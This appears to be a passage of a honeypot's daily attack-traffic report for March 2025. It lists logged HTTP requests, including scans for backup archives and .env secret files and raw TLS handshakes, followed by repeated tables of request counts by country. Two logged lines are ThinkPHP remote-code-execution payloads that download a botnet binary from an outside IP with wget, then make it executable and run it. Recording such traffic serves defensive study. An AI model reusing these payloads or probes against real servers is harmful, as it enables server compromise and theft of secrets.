532	1	GET /html.zip HTTP/1.1
533	1	GET /www.zip HTTP/1.1
534	1	GET /web.zip HTTP/1.1
535	1	\x16\x03\x01\x00\xEA\x01\x00\x00\xE6\x03\x03\xCAS\x8F~\xB7s
536	1	GET /bin.7z HTTP/1.1
537	1	GET /html.7z HTTP/1.1
538	1	GET /www.7z HTTP/1.1
539	1	GET /web.7z HTTP/1.1
540	1	GET /backup.7z HTTP/1.1
541	1	\x16\x03\x01\x00\xAC\x01\x00\x00\xA8\x03\x03\xB1\x88{\xA9\xC1MG\x14\x84\x90b\x90\xF5\x8E\x06]\xA4+,\x8B\xE8\xAA\xA2#\x1C7\x814\xB9\xDE?I\x00\x008\xC0,\xC0
542	1	\x16\x03\x01\x00{\x01\x00\x00w\x03\x03\xD1\x12\x05D’sv\xD4\xF9\xA2\x9F6w\x9D\xF3\xD0\x87\xD5\xE5\xCB\xE2\x82\xBA.M^\x05\xFE\xA0\x15\xA4’\x00\x00\x1A\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0
543	1	\x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03\x01\xBB\xA4\x05\xF0\xDD\x15>17\xF7s<\x10\xBE\xD4ZD\xE9\xE0lX\x8C\x92\xF00\x08q\x80\x1B\xD4\xD7 \x05\x93:\x97
544	1	\x16\x03\x01\x02\x00\x01\x00\x01\xFC\x03\x03Ae,K\xFE\x04~\xD1\xD2\x18\xEF\x15\xD5\xF7qA\x227\x9F6X\xFF\xA0\x95\xF3`\x8E\x9CQqHp I\xFF\x996\xA2\xCDh\xD2\xF0'\x22\xD6`\x90\xB2\x8AlF\x06\xB5\xBE+b\xAC\xF3s\xC8\x83\x83\xA8?1\x00\xAE\x13\x02\x13\x03\x13\x01\xC0,\xC00\x00\xA3\x00\x9F\xCC\xA9\xCC\xA8\xCC\xAA\xC0\xAF\xC0\xAD\xC0\xA3\xC0\x9F\xC0]\xC0a\xC0W\xC0S\x00\xA7\xC0+\xC0/\x00\xA2\x00\x9E\xC0\xAE\xC0\xAC\xC0\xA2\xC0\x9E\xC0\x5C\xC0`\xC0V\xC0R\x00\xA6\xC0$\xC0(\x00k\x00j\xC0s\xC0w\x00\xC4\x00\xC3\x00m\x00\xC5\xC0#\xC0’\x00g\x00@\xC0r\xC0v\x00\xBE\x00\xBD\x00l\x00\xBF\xC0
545	1	\x16\x03\x01\x00{\x01\x00\x00w\x03\x03d\x02\xFA\xEDL\x9D\xDB\x1A\xC7p\x07\x89n\xFA\x99S\xC5\xB4\x80\x8C\x8AX)c\x12.\x81\x17\x0E\xB1\xC6:\x00\x00\x1A\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0
546	1	\x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03g\x816\x9D\x06\xDD\x03\xFA$*\x01\xAE\x04\xD5c\xFEr\xB9
547	1	GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=‘wget http://193.239.147.201/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp’ HTTP/1.1
548	1	\x16\x03\x01\x00{\x01\x00\x00w\x03\x03o\x1F \xD59\x14\xEF\xA8a
549	1	GET /nshkarm7 HTTP/1.1
550	1	GET /www.rar HTTP/1.1
551	1	GET /web.rar HTTP/1.1
552	1	GET /backup.rar HTTP/1.1
553	1	GET /xxx.xxx.xxx.xxx.zip HTTP/1.1
554	1	GET /old.zip HTTP/1.1
555	1	GET /data.zip HTTP/1.1
556	1	\x16\x03\x01\x00\xAC\x01\x00\x00\xA8\x03\x03\xDC\xFB\x91\xE4\x12j\xF7\xB0N\xEE}\xAA\x08l\xBB\xCC\x170\xBD\x88\x13\x15\xB6\xAE\x80\x15\xDD’;\xB3\xFA\xCF\x00\x008\xC0,\xC0
557	1	\x16\x03\x03\x01\xA6\x01\x00\x01\xA2\x03\x03/\x13\x06\x0E\x82\x92\xC4\xCA8\x83<\x11\xA6\xA2\xBD7\xE2\xF3C\xA6~c\x03\x00\xB1\x13/&d\xFE:\xC8 \xD2+\xEC\x8B\xC3\x8E \xD8\xA3N\xC1\xB2\xAC\x04\xD0/\x1C\x06\xED\xB4k\x11\x0E\x11\x10\x019\x95\xD3K\xD8\x0C\x00\x8A\x00\x16\x003\x00g\xC0\x9E\xC0\xA2\x00\x9E\x009\x00k\xC0\x9F\xC0\xA3\x00\x9F\x00E\x00\xBE\x00\x88\x00\xC4\x00\x9A\xC0\x08\xC0\x09\xC0#\xC0\xAC\xC0\xAE\xC0+\xC0
558	1	\x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03’\xD9!\xA3<C\x1F\xE3\xEB\xB4\xDA\xC9O\xC6\x96\x17\x08\x87\xDA\xED
559	1	GET /login/.env HTTP/1.1
560	1	GET /old.env HTTP/1.1
561	1	GET /well-known/.env HTTP/1.1
562	1	GET /theme/.env HTTP/1.1
563	1	GET /error/.env HTTP/1.1
564	1	GET /css/.env HTTP/1.1
565	1	GET /psnlink/.env HTTP/1.1
566	1	GET /opt/.env HTTP/1.1
567	1	GET /ads/.env HTTP/1.1
568	1	GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=‘wget http://185.225.75.8/bins/vcimanagement.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp’ HTTP/1.1
569	1	\x16\x03\x01\x00{\x01\x00\x00w\x03\x03\xBF\x19\xD6\xB6\x92\xA5\x174\x9B\xAB9q\x1B\x16\xE7`\x88\xC9\xF2^\xCB\xC1\x10\x8DV W\xD5\xB1\xFBK\xF7\x00\x00\x1A\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0
570	1	\x16\x03\x01\x00{\x01\x00\x00w\x03\x03\xE9!\xC5\xA3E8o\x89\x11.\xCF\xDC\x89\xD52\x93.X\xED9\xFD\xFE~\xEA2\xF9\xBET\x1E\xB5#\xCF\x00\x00\x1A\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0
571	1	\x16\x03\x01\x00\xAC\x01\x00\x00\xA8\x03\x03\x8F\x1A\xBA \xAA\x18\xAC\x05\xD2\x18y\xFF\xEF\xF7\x01Kw\xE9\x5C\x1D\x7F\x98%\x09Du j\xD9\xF4QO\x00\x008\xC0,\xC0
572	1	\x16\x03\x01\x00\xEA\x01\x00\x00\xE6\x03\x03o\x87#\xAF$v$\xC7\x88\xEA\x9An\xFFU\x8E\x19\x823
573	1	\x16\x03\x01\x00\xAC\x01\x00\x00\xA8\x03\x03\xE1\xCD-<\x98\x8C\xDE\xE1\x09`=\xD4\xDE/\xE3\xA4Zn\x5C\xD0d\xFC\xB2D*\xD8Lr\xF5\xB8\xE4\x04\x00\x008\xC0,\xC0
574	1	GET /styles/.env HTTP/1.1
575	1	GET /scripts/.env HTTP/1.1
576	1	GET /engine/.env HTTP/1.1
577	1	GET /environments/production/.env HTTP/1.1
578	1	GET /environments/local/.env HTTP/1.1
579	1	GET /backup.zip HTTP/1.1
580	1	GET /frontend/.env HTTP/1.1
581	1	GET /local/.env.prod HTTP/1.1

country_iso_code
#

	number_of_occurence	country_iso_code
0	875	NL
1	552	US
2	201	AU
3	174	BG
4	154	PL
5	149	GB
6	134	FR
7	133	CN
8	86	HK
9	84	DE
10	81	ES
11	62	TW
12	56	KR
13	52	BR
14	48	PT
15	31	AE
16	27	SC
17	25	CA
18	22	JP
19	18	UA
20	16	AR
21	16	VE
22	13	RU
23	12	IN
24	10	SG
25	10	CH
26	9	BE
27	7	NO
28	7	GH
29	6	NG
30	5	IT
31	5	TR
32	4	AO
33	3	MX
34	3	RO
35	2	VN
36	2	GE
37	2	CZ
38	2	IR
39	1	HU
40	1	PH
41	1	KH
42	1	ID
43	1	AZ

Report: 2025-03-19

19 March 2025·5975 words

Repport Daily

Report: 2025-03-18

18 March 2025·5420 words

Repport Daily

Report: 2025-03-17

17 March 2025·6306 words

Repport Daily

	number_of_occurence	country_iso_code
0	875	NL
1	552	US
2	201	AU
3	174	BG
4	154	PL
5	149	GB
6	134	FR
7	133	CN
8	86	HK
9	84	DE
10	81	ES
11	62	TW
12	56	KR
13	52	BR
14	48	PT
15	31	AE
16	27	SC
17	25	CA
18	22	JP
19	18	UA
20	16	AR
21	16	VE
22	13	RU
23	12	IN
24	10	SG
25	10	CH
26	9	BE
27	7	NO
28	7	GH
29	6	NG
30	5	IT
31	5	TR
32	4	AO
33	3	MX
34	3	RO
35	2	VN
36	2	GE
37	2	CZ
38	2	IR
39	1	HU
40	1	PH
41	1	KH
42	1	ID
43	1	AZ

	number_of_occurence	country_iso_code
0	875	NL
1	552	US
2	201	AU
3	174	BG
4	154	PL
5	149	GB
6	134	FR
7	133	CN
8	86	HK
9	84	DE
10	81	ES
11	62	TW
12	56	KR
13	52	BR
14	48	PT
15	31	AE
16	27	SC
17	25	CA
18	22	JP
19	18	UA
20	16	AR
21	16	VE
22	13	RU
23	12	IN
24	10	SG
25	10	CH
26	9	BE
27	7	NO
28	7	GH
29	6	NG
30	5	IT
31	5	TR
32	4	AO
33	3	MX
34	3	RO
35	2	VN
36	2	GE
37	2	CZ
38	2	IR
39	1	HU
40	1	PH
41	1	KH
42	1	ID
43	1	AZ

Daily Report: 2025-03-20#

ot_simplified_report#

botnet_dropper_behaviour#

user_agent#

request#

country_iso_code#

Related

Daily Report: 2025-03-20
#

ot_simplified_report
#

botnet_dropper_behaviour
#

user_agent
#

request
#

country_iso_code
#

	number_of_occurence	country_iso_code
0	875	NL
1	552	US
2	201	AU
3	174	BG
4	154	PL
5	149	GB
6	134	FR
7	133	CN
8	86	HK
9	84	DE
10	81	ES
11	62	TW
12	56	KR
13	52	BR
14	48	PT
15	31	AE
16	27	SC
17	25	CA
18	22	JP
19	18	UA
20	16	AR
21	16	VE
22	13	RU
23	12	IN
24	10	SG
25	10	CH
26	9	BE
27	7	NO
28	7	GH
29	6	NG
30	5	IT
31	5	TR
32	4	AO
33	3	MX
34	3	RO
35	2	VN
36	2	GE
37	2	CZ
38	2	IR
39	1	HU
40	1	PH
41	1	KH
42	1	ID
43	1	AZ